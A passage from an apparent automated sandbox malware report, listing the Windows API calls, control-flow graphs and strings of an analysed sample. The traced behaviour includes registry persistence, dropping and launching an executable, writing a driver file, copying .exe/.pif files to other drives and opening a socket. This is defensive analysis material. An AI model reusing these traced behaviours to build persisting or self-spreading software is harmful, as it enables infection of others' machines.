                                    • CharLowerA.USER32(00000000,?,?,00000000,02433630,024A0240,000000FF,?,0242CB1B,00000003,00000000,00000000,00000000), ref: 0242BB9C
                                    • lstrcat.KERNEL32(?,024A565C), ref: 0242BBDF
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0242BBED
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0242BC11
                                    • Sleep.KERNEL32(?), ref: 0242BC67
                                    • lstrlen.KERNEL32(?), ref: 0242BC74
                                    • lstrcat.KERNEL32(?,?), ref: 0242BCAF
                                    • lstrlen.KERNEL32(?), ref: 0242BCB9
                                    • CharUpperA.USER32(?), ref: 0242BCCC
                                    • lstrlen.KERNEL32(?), ref: 0242BCD9
                                    • lstrcmpiA.KERNEL32(?,024A4044), ref: 0242BCF6
                                    • lstrcmpiA.KERNEL32(?,024A404C), ref: 0242BD0D
                                    • lstrcpy.KERNEL32(?,?), ref: 0242BDAF
                                    • lstrlen.KERNEL32(?), ref: 0242BDBC
                                    • lstrcmpiA.KERNEL32(?,024A3F68), ref: 0242BDEA
                                    • FindClose.KERNEL32(00000000), ref: 0242BE65
                                    • Sleep.KERNEL32(00000400), ref: 0242BE70
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$FindSleeplstrcatlstrcmpi$CharFilelstrcpy$CloseFirstLowerNextUpper
                                    • String ID: c:\windows$d
                                    • API String ID: 4181266269-1584695526

                                    Control-flow Graph

                                    APIs
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00638223
                                    • WriteFile.KERNEL32(00000000,FFFEB9FF,00003E00,?,00000000), ref: 00638252
                                    • WinExec.KERNEL32(?,00000005), ref: 00638262
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: File$CreateExecWrite
                                    • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$YMZwp.exe$athA$catA$dleA$el32$lstr$odul
                                    • API String ID: 2079927699-3592004379

                                    Control-flow Graph

                                    APIs
                                    • GetTempPathA.KERNEL32(00000100,00000000), ref: 02425812
                                    • lstrlen.KERNEL32(00000000), ref: 0242581F
                                    • lstrcat.KERNEL32(00000000,024A55E0), ref: 0242583E
                                    • lstrlen.KERNEL32(00000000), ref: 02425858
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02425872
                                    • lstrcat.KERNEL32(00000000,024A55E4), ref: 02425884
                                    • FindFirstFileA.KERNEL32(00000000,00000000), ref: 024258AE
                                    • FindNextFileA.KERNELBASE(000000FF,00000000), ref: 024258D5
                                    • lstrcat.KERNEL32(00000000,?), ref: 024258FF
                                    • lstrlen.KERNEL32(00000000), ref: 0242590C
                                    • lstrlen.KERNEL32(?), ref: 0242591F
                                    • lstrcmpiA.KERNEL32(00000000,024A4044), ref: 0242593C
                                    • lstrcmpiA.KERNEL32(00000000,_Rar), ref: 02425980
                                    • Sleep.KERNEL32(00000100), ref: 0242599E
                                    • FindClose.KERNEL32(00000000), ref: 024259B9
                                    • Sleep.KERNEL32(000927C0), ref: 024259C4
                                    • RtlExitUserThread.NTDLL(00000000), ref: 024259D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Findlstrcat$FileSleeplstrcmpi$CloseExitFirstNextPathTempThreadUserlstrcpy
                                    • String ID: _Rar
                                    • API String ID: 3155258034-536834240

                                    Control-flow Graph

                                    APIs
                                    • lstrcpy.KERNEL32(00000000,Software\), ref: 0242F80E
                                    • GetUserNameA.ADVAPI32(00000000,00000104), ref: 0242F822
                                    • lstrlen.KERNEL32(00000000), ref: 0242F847
                                    • lstrcat.KERNEL32(00000000,024A3CBC), ref: 0242F860
                                    • lstrlen.KERNEL32(00000000), ref: 0242F888
                                    • lstrlen.KERNEL32(00000000), ref: 0242F8CD
                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 0242F8F6
                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0242F91E
                                    • RegEnumValueA.KERNEL32(00000000,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 0242F96F
                                    • RegCloseKey.KERNEL32(00000000), ref: 0242FCD5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$CloseCreateEnumNameOpenUserValuelstrcatlstrcpy
                                    • String ID: %c%d_%d$Software\
                                    • API String ID: 1562553360-4194366771
                                    APIs
                                    • GetProcessHeap.KERNEL32 ref: 00450D29
                                    • OleInitialize.OLE32(00000000), ref: 00450D65
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00450D83
                                    • SetCurrentDirectoryA.KERNEL32(04965C00,?), ref: 00450DDD
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 00450E38
                                    • GetStockObject.GDI32(00000005), ref: 00450E59
                                    • GetCurrentThreadId.KERNEL32 ref: 00450E81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Current$CursorDirectoryFileHeapInitializeLoadModuleNameObjectProcessStockThread
                                    • String ID: DM$_EL_HideOwner$jB
                                    • API String ID: 3783217854-3818869847
                                    • Opcode ID: 446e3f6c5886f9dbfe92c663de1827519eb4d7e6305f427b1d3ef0b3f55e38c9
                                    • Instruction ID: 120eafc8109afcb3ae4fd507eadf9738e8a24ef231c213c608d1767f5ccd2d85
                                    • Opcode Fuzzy Hash: 446e3f6c5886f9dbfe92c663de1827519eb4d7e6305f427b1d3ef0b3f55e38c9
                                    • Instruction Fuzzy Hash: 77E1F271A002059BCB64EF55DC81FEEB7B4FF44309F14406EE905A7392EB786949CBA8
                                    APIs
                                    • htons.WS2_32(00001326), ref: 024239D3
                                    • socket.WS2_32(00000002,00000002,00000000), ref: 024239F0
                                    • setsockopt.WS2_32(?,0000FFFF,00001002,00100000,00000004), ref: 02423A2E
                                    • bind.WS2_32(?,00000002,00000010), ref: 02423A44
                                    • closesocket.WS2_32(?), ref: 02423B28
                                    • RtlExitUserThread.NTDLL(00000000), ref: 02423B30
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitThreadUserbindclosesockethtonssetsockoptsocket
                                    • String ID:
                                    • API String ID: 3895830221-0
                                    • Opcode ID: ce16872d7a8a14354c753c9a93369630368d01cbdcbc59d19464ba79b4328b99
                                    • Instruction ID: a58f9413bfa9e10fcbe5316a379422e07326aa690d81b704e83f624340eea0b7
                                    • Opcode Fuzzy Hash: ce16872d7a8a14354c753c9a93369630368d01cbdcbc59d19464ba79b4328b99
                                    • Instruction Fuzzy Hash: DC512E74D402A8DBEB35DF55CD49BD9BBB4AF08701F4085DAE289A6280D7F85AC8CF14
                                    APIs
                                    • NtdllDefWindowProc_A.NTDLL(?,?,?,?,?,?,00415AE0,00000085,00000001,00000000), ref: 004BE776
                                    • CallWindowProcA.USER32(?,?,?,?,?), ref: 004BE78B
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$CallNtdllProcProc_
                                    • String ID:
                                    • API String ID: 1646280189-0
                                    • Opcode ID: 540b9c0104fec27db50130639ed8ee2e22dc42e5b1985e1d4f54ecb7bdd7100c
                                    • Instruction ID: 510b02e34562119cc61bea14c5444192b55423426ae9a35fea421a4cd43fc52c
                                    • Opcode Fuzzy Hash: 540b9c0104fec27db50130639ed8ee2e22dc42e5b1985e1d4f54ecb7bdd7100c
                                    • Instruction Fuzzy Hash: 8EF09236100208FFCF619F95DC44DDABFBAFF58365B148529FA4986520DB32D820AB55

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 426 242e6f0-242e779 call 2433600 call 242dc56 LoadLibraryA 431 242e7c5-242e7df LoadLibraryA 426->431 432 242e77b-242e7c0 GetProcAddress * 3 426->432 433 242e7e1-242e83f GetProcAddress * 4 431->433 434 242e844-242e866 RegOpenKeyExA 431->434 432->431 433->434 435 242e8a0-242e8c2 RegOpenKeyExA 434->435 436 242e868-242e89a RegSetValueExA RegCloseKey 434->436 437 242e8c4-242e8f6 RegSetValueExA RegCloseKey 435->437 438 242e8fc-242e945 lstrcpy lstrcat RegOpenKeyExA 435->438 436->435 437->438 439 242e9b2-242e9d4 RegOpenKeyExA 438->439 440 242e947-242e9ac GetModuleFileNameA wsprintfA lstrlen RegSetValueExA RegCloseKey 438->440 441 242e9da-242ea62 RegSetValueExA * 3 RegCloseKey 439->441 442 242ea68-242ea96 GetComputerNameA lstrlen 439->442 440->439 441->442 443 242eae6-242eb23 CreateFileMappingA call 2421444 call 2421b0e lstrlen 442->443 444 242ea98-242eadf lstrlen 442->444 449 242eb25 call 24259de 443->449 450 242eb2a-242eb6b 443->450 444->443 449->450 452 242eb79-242eba5 call 24213e8 GetTickCount wsprintfA 450->452 453 242eb6d-242eb77 450->453 454 242eba8-242ebb8 452->454 453->452 453->454 457 242ec82-242ecbb lstrcat GetSystemDirectoryA lstrlen 454->457 458 242ebbe-242ebce 454->458 460 242eccd-242ed34 lstrcat * 2 GetWindowsDirectoryA CharLowerA GlobalAlloc * 2 457->460 461 242ecbd-242ecc7 lstrcat 457->461 458->457 459 242ebd4-242ebe3 458->459 459->457 462 242ebe9-242ec1f 459->462 461->460 463 242ec21-242ec2d 462->463 464 242ec2f 462->464 465 242ec39-242ec79 lstrlen wsprintfA 463->465 464->465 466 242ec7b 465->466 467 242ec7d 465->467 466->457 467->454
                                    APIs
                                      • Part of subcall function 0242DC56: RegOpenKeyExA.KERNEL32(80000001,024A3DA8,00000000,000F003F,?,?), ref: 0242DC9D
                                      • Part of subcall function 0242DC56: RegSetValueExA.KERNELBASE(?,024A3DE4,00000000,00000004,00000002,00000004), ref: 0242DCCB
                                      • Part of subcall function 0242DC56: RegCloseKey.KERNEL32(?), ref: 0242DCD8
                                      • Part of subcall function 0242DC56: lstrcpy.KERNEL32(00000000,024A3EAC), ref: 0242DD33
                                      • Part of subcall function 0242DC56: lstrcat.KERNEL32(00000000,024A3EA4), ref: 0242DD46
                                    • LoadLibraryA.KERNEL32(024A3AAC), ref: 0242E766
                                    • GetProcAddress.KERNEL32(00000000,024A40E0), ref: 0242E789
                                    • GetProcAddress.KERNEL32(00000000,024A40F4), ref: 0242E7A1
                                    • GetProcAddress.KERNEL32(00000000,024A4104), ref: 0242E7BA
                                    • LoadLibraryA.KERNEL32(024A41E8), ref: 0242E7CC
                                    • GetProcAddress.KERNEL32(00000000,024A422C), ref: 0242E7EF
                                    • GetProcAddress.KERNEL32(00000000,024A4204), ref: 0242E808
                                    • GetProcAddress.KERNEL32(00000000,024A4218), ref: 0242E820
                                    • GetProcAddress.KERNEL32(00000000,024A41F4), ref: 0242E839
                                    • RegOpenKeyExA.KERNEL32(80000001,024A3B2C,00000000,000F003F,00000000), ref: 0242E85E
                                    • RegSetValueExA.KERNEL32(00000000,024A3B18,00000000,00000004,00000000,00000004), ref: 0242E88D
                                    • RegCloseKey.KERNEL32(00000000), ref: 0242E89A
                                    • RegOpenKeyExA.KERNEL32(80000002,024A3C44,00000000,000F003F,00000000), ref: 0242E8BA
                                    • RegSetValueExA.KERNEL32(00000000,024A3C80,00000000,00000004,00000000,00000004), ref: 0242E8E9
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0242E8F6
                                    • lstrcpy.KERNEL32(00000000,024A3CE0), ref: 0242E90A
                                    • lstrcat.KERNEL32(00000000,024A3D88), ref: 0242E91D
                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,00000000), ref: 0242E93D
                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000200), ref: 0242E955
                                    • wsprintfA.USER32 ref: 0242E96F
                                    • lstrlen.KERNEL32(?), ref: 0242E97F
                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 0242E99F
                                    • RegCloseKey.ADVAPI32(?), ref: 0242E9AC
                                    • RegOpenKeyExA.KERNEL32(80000002,024A3CE0,00000000,000F003F,00000000), ref: 0242E9CC
                                    • RegSetValueExA.KERNELBASE(00000000,024A40A0,00000000,00000004,00000000,00000004), ref: 0242E9FF
                                    • RegSetValueExA.KERNELBASE(00000000,024A40B0,00000000,00000004,00000000,00000004), ref: 0242EA2A
                                    • RegSetValueExA.KERNEL32(00000000,024A40C8,00000000,00000004,00000001,00000004), ref: 0242EA55
                                    • RegCloseKey.KERNEL32(00000000), ref: 0242EA62
                                    • GetComputerNameA.KERNEL32(00000000,00000080), ref: 0242EA80
                                    • lstrlen.KERNEL32(00000000), ref: 0242EA8D
                                    • lstrlen.KERNEL32(00000000), ref: 0242EAAB
                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,024A3CC8), ref: 0242EAF9
                                    • lstrlen.KERNEL32(53263431135), ref: 0242EB1B
                                    • GetTickCount.KERNEL32 ref: 0242EB8C
                                    • wsprintfA.USER32 ref: 0242EB9F
                                    • lstrlen.KERNEL32(?,024A572C,0000006E), ref: 0242EC4C
                                    • wsprintfA.USER32 ref: 0242EC5A
                                    • lstrcat.KERNEL32(?,024A3BC4), ref: 0242EC90
                                    • GetSystemDirectoryA.KERNEL32(C:\Windows\system32\drivers\llkhhn.sys,00000080), ref: 0242ECA0
                                    • lstrlen.KERNEL32(C:\Windows\system32\drivers\llkhhn.sys), ref: 0242ECAB
                                    • lstrcat.KERNEL32(C:\Windows\system32\drivers\llkhhn.sys,024A5730), ref: 0242ECC7
                                    • lstrcat.KERNEL32(C:\Windows\system32\drivers\llkhhn.sys,024A3BE0), ref: 0242ECD9
                                    • lstrcat.KERNEL32(C:\Windows\system32\drivers\llkhhn.sys,?), ref: 0242ECEB
                                    • GetWindowsDirectoryA.KERNEL32(c:\windows,00000104), ref: 0242ECFB
                                    • CharLowerA.USER32(c:\windows), ref: 0242ED06
                                    • GlobalAlloc.KERNEL32(00000040,00021000), ref: 0242ED13
                                    • GlobalAlloc.KERNEL32(00000040,00021000), ref: 0242ED25
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProcValue$lstrcatlstrlen$CloseOpen$wsprintf$AllocDirectoryFileGlobalLibraryLoadNamelstrcpy$CharComputerCountCreateLowerMappingModuleSystemTickWindows
                                    • String ID: 53263431135$C:\Windows\system32\drivers\llkhhn.sys$c:\windows$n
                                    • API String ID: 3069067183-4190467421
                                    • Opcode ID: 9b103a5227ca4b383f10f706d186db478b53b198ad0e21a960399f893c2ef378
                                    • Instruction ID: 06a9eb5e986ea89b4d6dee09d36efdc46e55e9d01b0ca9d19534416ab7fb022d
                                    • Opcode Fuzzy Hash: 9b103a5227ca4b383f10f706d186db478b53b198ad0e21a960399f893c2ef378
                                    • Instruction Fuzzy Hash: D2F192B5E802149FEB19CFA4DC9DFAA7B79BB48702F004999E30DA7280D7705A94CF54

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 468 242dd99-242deeb call 2433600 call 24213e8 Sleep call 2425be5 CreateFileA 475 242df1a-242df34 call 2429652 468->475 476 242deed-242df14 WriteFile CloseHandle 468->476 479 242df43-242df4d 475->479 480 242df36-242df41 Sleep 475->480 476->475 481 242e4d3-242e504 RtlExitUserThread 479->481 482 242df53-242df5d 479->482 480->475 482->481 484 242df63-242df6f 482->484 484->481 485 242df75-242df82 484->485 485->481 486 242df88-242df8f 485->486 486->481 487 242df95-242dfdd call 242dc56 Sleep GetLogicalDrives 486->487 491 242e4c3-242e4ce Sleep 487->491 492 242dfe3-242e001 487->492 491->486 493 242e007-242e045 GetDriveTypeA 492->493 494 242e4be 492->494 493->494 495 242e04b-242e087 lstrcat CreateFileA 493->495 494->491 496 242e2b0-242e2ca GetFileAttributesA 495->496 497 242e08d-242e0c5 GetFileTime FileTimeToSystemTime 495->497 498 242e2f7-242e320 CreateFileA 496->498 499 242e2cc-242e2f4 SetFileAttributesA DeleteFileA call 2425758 496->499 500 242e2a3-242e2aa CloseHandle 497->500 501 242e0cb-242e0e7 497->501 498->494 504 242e326-242e3ac GetSystemTime SystemTimeToFileTime call 2425618 call 24213e8 498->504 499->498 500->496 501->500 503 242e0ed-242e142 call 2421000 ReadFile CharLowerA lstrlen 501->503 510 242e148-242e165 call 24242c7 503->510 511 242e29e 503->511 516 242e3c2-242e3ce lstrcat 504->516 517 242e3ae-242e3c0 lstrcat 504->517 510->511 519 242e16b-242e17e 510->519 511->500 518 242e3d4-242e47c call 242d928 lstrlen WriteFile SetFileTime CloseHandle SetFileAttributesA CreateFileA 516->518 517->518 518->494 524 242e47e-242e4b8 WriteFile CloseHandle SetFileAttributesA 518->524 519->511 523 242e184-242e18d 519->523 525 242e193-242e1a5 523->525 526 242e299 523->526 524->494 527 242e1b0-242e1b3 525->527 528 242e1a7-242e1ad 525->528 526->511 529 242e1b9-242e1c5 527->529 528->527 530 242e1f3-242e21d lstrcpy GetFileAttributesA 529->530 531 242e1c7-242e1d3 529->531 533 242e297 530->533 534 242e21f-242e255 CloseHandle 
CreateFileA 530->534 531->530 532 242e1d5-242e1e0 531->532 532->530 535 242e1e2-242e1f1 532->535 533->511 534->533 536 242e257-242e291 WriteFile CloseHandle SetFileAttributesA 534->536 535->529 536->533
                                    APIs
                                      • Part of subcall function 024213E8: InterlockedExchange.KERNEL32(024340B8,?), ref: 02421406
                                    • Sleep.KERNEL32 ref: 0242DEAD
                                      • Part of subcall function 02425BE5: GetTempPathA.KERNEL32(00000080,00000000,?), ref: 02425C17
                                      • Part of subcall function 02425BE5: lstrlen.KERNEL32(00000000), ref: 02425C21
                                      • Part of subcall function 02425BE5: lstrcat.KERNEL32(00000000,024A55F4), ref: 02425C3D
                                      • Part of subcall function 02425BE5: lstrcpy.KERNEL32(00000000,00000000), ref: 02425C5A
                                      • Part of subcall function 02425BE5: lstrlen.KERNEL32(00000000,024A41D4,00000000), ref: 02425C88
                                      • Part of subcall function 02425BE5: wsprintfA.USER32 ref: 02425C94
                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0242DED8
                                    • WriteFile.KERNEL32(000000FF,024A2300,000002E5,?,00000000), ref: 0242DF07
                                    • CloseHandle.KERNEL32(000000FF), ref: 0242DF14
                                    • Sleep.KERNEL32(00004E20), ref: 0242DF3B
                                    • Sleep.KERNEL32(00004E20), ref: 0242DF9F
                                    • GetLogicalDrives.KERNEL32 ref: 0242DFAF
                                    • GetDriveTypeA.KERNEL32(?), ref: 0242E032
                                    • lstrcat.KERNEL32(?,024A4094), ref: 0242E058
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 0242E074
                                    • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0242E0A9
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0242E0BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$SleepTime$Createlstrcatlstrlen$CloseDriveDrivesExchangeHandleInterlockedLogicalPathSystemTempTypeWritelstrcpywsprintf
                                    • String ID: .exe$.pif$:$\
                                    • API String ID: 1830140040-4138429844
                                    • Opcode ID: 58c3cd3ba7b98c19600d5f6021d246f545cf2a4f4c53ebc510b8882454eef320
                                    • Instruction ID: 9602412e39b13e6053f46c7a5527f4878a849610d923d0ac22f908fabb6d119d
                                    • Opcode Fuzzy Hash: 58c3cd3ba7b98c19600d5f6021d246f545cf2a4f4c53ebc510b8882454eef320
                                    • Instruction Fuzzy Hash: F312B371D44268DBDB28DB61DC88BEEBB75BF48304F0045D9E209E62C0D774AAA8CF50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 620 2421b0e-2421bbc call 2433600 623 2421bc3-2421c18 lstrcpy GetUserNameA call 2432ceb lstrlen 620->623 624 2421bbe 620->624 628 2421c1a-2421c27 lstrcat 623->628 629 2421c2d-2421c37 623->629 625 24222a3-24222b3 624->625 628->629 630 2421c48-2421c5b lstrlen 629->630 631 2421ca3-2421cfd lstrlen wsprintfA RegOpenKeyExA 630->631 632 2421c5d-2421ca1 lstrlen 630->632 634 2421d03-2421d1e RegCreateKeyA 631->634 635 2421f5d-2421f7f 631->635 632->630 636 2421d20-2421d27 634->636 637 2421d2c-2421d50 GlobalAlloc call 2427c71 634->637 640 2421f85-2421faf wsprintfA 635->640 641 24220ea-24220f1 635->641 636->625 650 2421d52-2421d5e call 2422399 637->650 651 2421d66-2421d6d 637->651 645 2421fb1-2421fe3 RegQueryValueExA 640->645 646 2421fec-2422025 RegQueryValueExA 640->646 642 24220f7-2422252 call 2432ceb * 5 call 2422399 641->642 643 2422274-242227b 641->643 709 2422254-242226d call 2432ceb 642->709 710 242226f 642->710 648 242228a-2422291 643->648 649 242227d-2422284 RegCloseKey 643->649 652 2421fe5 645->652 653 2421fea 645->653 654 2422027 646->654 655 242202c-242204e 646->655 648->625 649->648 672 2421d63 650->672 660 2421d73-2421d95 651->660 661 2421f3b-2421f42 651->661 653->655 654->655 656 2422054-242205a 655->656 657 24220e5 655->657 662 2422061-242206d 656->662 663 242208b-2422099 656->663 664 242209b-24220a7 656->664 665 24220c8-24220e2 call 242169b 656->665 666 24220a9-24220c6 call 242169b 656->666 667 242206f-242207b 656->667 668 242207d-2422089 656->668 657->641 675 2421d9b-2421de0 wsprintfA 660->675 676 2421ecf-2421f38 RegCloseKey call 2432ceb * 2 660->676 670 2421f51-2421f58 661->670 671 2421f44-2421f4b GlobalFree 661->671 662->657 663->657 664->657 665->657 666->657 667->657 668->657 670->625 671->670 672->651 683 2421e71-2421e78 675->683 684 2421de6-2421dec 675->684 676->661 694 2421e7a-2421e9b RegSetValueExA 683->694 695 2421e9d-2421ec4 lstrlen RegSetValueExA 683->695 684->662 684->663 684->664 684->665 
684->666 684->667 684->668 687 2421e23-2421e2d 684->687 688 2421e0b-2421e15 684->688 689 2421e2f-2421e4f call 24216fd lstrcpy 684->689 690 2421df3-2421dfd 684->690 691 2421e51-2421e6b call 24216fd lstrcpy 684->691 692 2421e17-2421e21 684->692 693 2421dff-2421e09 684->693 687->683 688->683 689->683 690->683 691->683 692->683 693->683 700 2421eca 694->700 695->700 709->643 710->643
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,Software\), ref: 02421BD6
                                    • GetUserNameA.ADVAPI32(00000000,?), ref: 02421BEA
                                    • lstrlen.KERNEL32(?), ref: 02421C0F
                                    • lstrcat.KERNEL32(?,024A3CBC), ref: 02421C27
                                    • lstrlen.KERNEL32(?), ref: 02421C4F
                                    • lstrlen.KERNEL32(?), ref: 02421C94
                                    • lstrlen.KERNEL32(?,\%d,?), ref: 02421CC4
                                    • wsprintfA.USER32 ref: 02421CD2
                                    • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 02421CF5
                                    • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 02421D16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$CreateNameOpenUserlstrcatlstrcpywsprintf
                                    • String ID: Software\$\%d
                                    • API String ID: 939812716-407207646
                                    • Opcode ID: 4a63a79344c5e8ef470ca4c329da0fb65becba66b68374ac003468b5c50876ed
                                    • Instruction ID: de8602b258ce60e3d644ce73715faa3cf0987c75a02a238356d7bb346410192b
                                    • Opcode Fuzzy Hash: 4a63a79344c5e8ef470ca4c329da0fb65becba66b68374ac003468b5c50876ed
                                    • Instruction Fuzzy Hash: 79125E75D04628DFDB24CF55CC84BEAB7B8BF88302F4046DAE50EAA281D7715A88CF51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 713 4310005-4310016 714 4310018-431004e 713->714 715 431002b-431003f 713->715 718 4310050-431005c 714->718 719 431005e-4310067 714->719 717 43100c6-4310134 LoadLibraryExA call 4310260 call 4310265 SetErrorMode CreateFileMappingA * 2 715->717 730 4310170-4310190 CreateThread 717->730 731 4310136-431014a MapViewOfFile 717->731 721 4310068-431006d 718->721 719->721 724 4310074-431007f 721->724 725 431006f 721->725 728 4310081 724->728 729 4310086-43100c0 call 4310286 call 4310260 call 4310286 call 4310260 724->729 727 43101ba-43101c1 725->727 733 4310253-431025b 727->733 734 43101c7-43101dd GetModuleFileNameA 727->734 728->727 729->717 737 4310196-431019d 730->737 731->730 735 431014c-4310159 731->735 733->727 738 4310240-4310245 Sleep 734->738 739 43101df-431020a LoadLibraryExA GetProcAddress 734->739 735->730 741 431015b-431016c 735->741 743 43101a9-43101b8 737->743 744 431019f-43101a7 Sleep 737->744 740 431024b-431024d ExitProcess 738->740 739->738 746 431020c-431023e CreateMutexA GetLastError 739->746 741->730 747 431016e 741->747 743->727 743->737 744->737 746->738 746->740 747->730
                                    APIs
                                    • LoadLibraryExA.KERNEL32(KERNEL32.DLL,00000000,00000000), ref: 043100D1
                                    • SetErrorMode.KERNEL32(00008002), ref: 043100F8
                                    • CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,hh8geqpHJTkdns0), ref: 04310112
                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_90833), ref: 0431012C
                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 04310142
                                    • CreateThread.KERNEL32(00000000,00000000,00B81737,?,00000000,04310694), ref: 04310190
                                    • Sleep.KERNEL32(000000FF), ref: 043101A1
                                    • GetModuleFileNameA.KERNEL32(00000000,04311778,000001FE), ref: 043101D5
                                    • LoadLibraryExA.KERNEL32(SHELL32.DLL,00000000,00000000), ref: 043101F4
                                    • GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 04310202
                                    • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0431022F
                                    • GetLastError.KERNEL32(00000000), ref: 04310236
                                    • Sleep.KERNEL32(000927C0), ref: 04310245
                                    • ExitProcess.KERNEL32(00000000), ref: 0431024D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3828792979.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: false
                                    Similarity
                                    • API ID: CreateFile$ErrorLibraryLoadMappingSleep$AddressExitLastModeModuleMutexNameProcProcessThreadView
                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns0$open$purity_control_90833

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000,?), ref: 0242BF11
                                    • GlobalAlloc.KERNEL32(00000040,-00001000), ref: 0242BF39
